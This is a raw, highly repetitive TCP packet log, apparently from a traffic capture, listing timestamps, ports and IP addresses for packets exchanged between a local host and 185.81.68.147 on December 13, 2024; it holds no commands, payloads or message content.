                                                                                                                                                                Dec 13, 2024 01:37:31.885438919 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.885494947 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.885545969 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.887005091 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.887056112 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.887100935 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.887149096 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.888570070 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.888618946 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.888673067 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.888725042 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.890230894 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.890264988 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.890285969 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.890306950 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.891745090 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.891797066 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.891859055 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.891912937 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.893250942 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.893297911 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.893477917 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.893527031 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.894382000 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.894416094 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.894433022 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.894457102 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.895081997 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.895131111 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.895190001 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.895236969 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.896030903 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.896164894 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.896173954 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.896527052 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.896943092 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.896997929 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.897022009 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.897069931 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.897816896 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.897891998 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.897936106 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.897986889 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.898767948 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.898823023 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.898885012 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.898933887 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.899837971 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.899872065 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.899888992 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.899915934 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.900645971 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.900679111 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.900696993 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.900721073 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.902034998 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.902067900 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.902082920 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.902113914 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.902492046 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.902532101 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.902539968 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.902580023 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.903254032 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.903318882 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.903400898 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.903448105 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.904182911 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.904232979 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.904354095 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.904402018 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.905169964 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.905219078 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.905267000 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.905314922 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.906017065 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.906068087 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.906682014 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.906735897 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.907012939 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.907046080 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.907063007 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.907088995 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.907819986 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.907871962 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.908276081 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.908327103 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.908823013 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.908873081 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.908936024 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.908982992 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.909627914 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.909674883 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.909681082 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.909723997 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.910542965 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.910590887 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.910708904 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.910753012 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.027211905 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.027288914 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.027349949 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.027396917 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.027854919 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.027868032 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.027899027 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.028789997 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.028801918 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.028836012 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.029413939 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.029455900 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.030563116 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.030575037 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.030585051 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.030607939 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.030628920 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.031209946 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.031250954 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.031366110 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.031404018 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.032542944 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.032556057 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.032588005 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.032975912 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.033019066 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.033047915 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.033086061 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.034085989 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.034096003 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.034244061 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.034259081 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.034827948 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.034838915 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.034873009 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.035599947 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.035612106 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.035640001 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.035664082 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.036578894 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.036607981 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.036660910 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.037271023 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.037327051 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.037377119 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.038053989 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.038098097 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.038336039 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.038980007 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.039028883 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.039032936 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.039817095 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.039875984 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.039880037 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.039916039 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.040795088 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.040807009 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.040858030 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.041495085 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.041709900 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.041776896 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.042555094 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.042567015 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.042613983 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.043370962 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.043382883 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.043431044 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.044163942 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.044235945 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.044342041 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.044920921 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.045142889 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.045201063 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.045727968 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.045785904 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.045998096 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.046829939 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.046838045 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.046844959 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.048868895 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.049333096 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.049343109 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.049349070 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.049370050 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.049400091 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.049400091 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.049416065 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.049423933 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.049449921 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.049474955 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.051397085 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.051409960 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.051422119 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.051434040 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.051450014 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.051462889 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.051491022 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.052567005 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.052581072 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.052609921 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.052628040 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.052634954 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.052668095 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.052697897 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.052736044 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.055084944 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.055095911 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.055107117 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.055119038 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.055134058 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.055160046 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.055254936 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.055267096 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.055295944 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.056138039 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.056150913 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.056197882 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.056891918 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.056941032 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.057213068 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.057760954 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.057816982 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.057852030 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.058659077 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.058695078 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.058712959 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.058737993 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.059393883 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.059663057 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.059720993 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.060340881 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.060441017 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.060493946 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.061168909 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.061218023 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.061460972 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.061966896 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.062091112 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.062125921 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.062138081 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.062855959 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.062941074 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.062957048 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.063010931 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.063637018 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.063688993 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.071367979 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.071403980 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.071438074 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.071463108 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.071470976 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.071492910 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.071508884 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.071516991 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.071546078 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.071556091 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.071588039 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.072586060 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.072638988 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.076921940 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.076956034 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.076977015 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.076989889 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.076996088 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.077023983 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.077033043 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.077063084 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.078001022 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.078036070 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.078058004 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.078078985 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.078260899 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.078296900 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.078310966 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.078340054 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.079046965 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.079097033 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.079098940 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.079145908 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.080178022 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.080213070 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.080226898 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.080255032 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.080682039 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.080717087 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.080733061 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.080768108 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.149744987 CET497381912192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.219497919 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.219572067 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.219599009 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.219676971 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.219815969 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.219866037 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.220010042 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.220072031 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.220887899 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.220930099 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.220936060 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.220973015 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.221554041 CET8049753185.81.68.147192.168.2.5
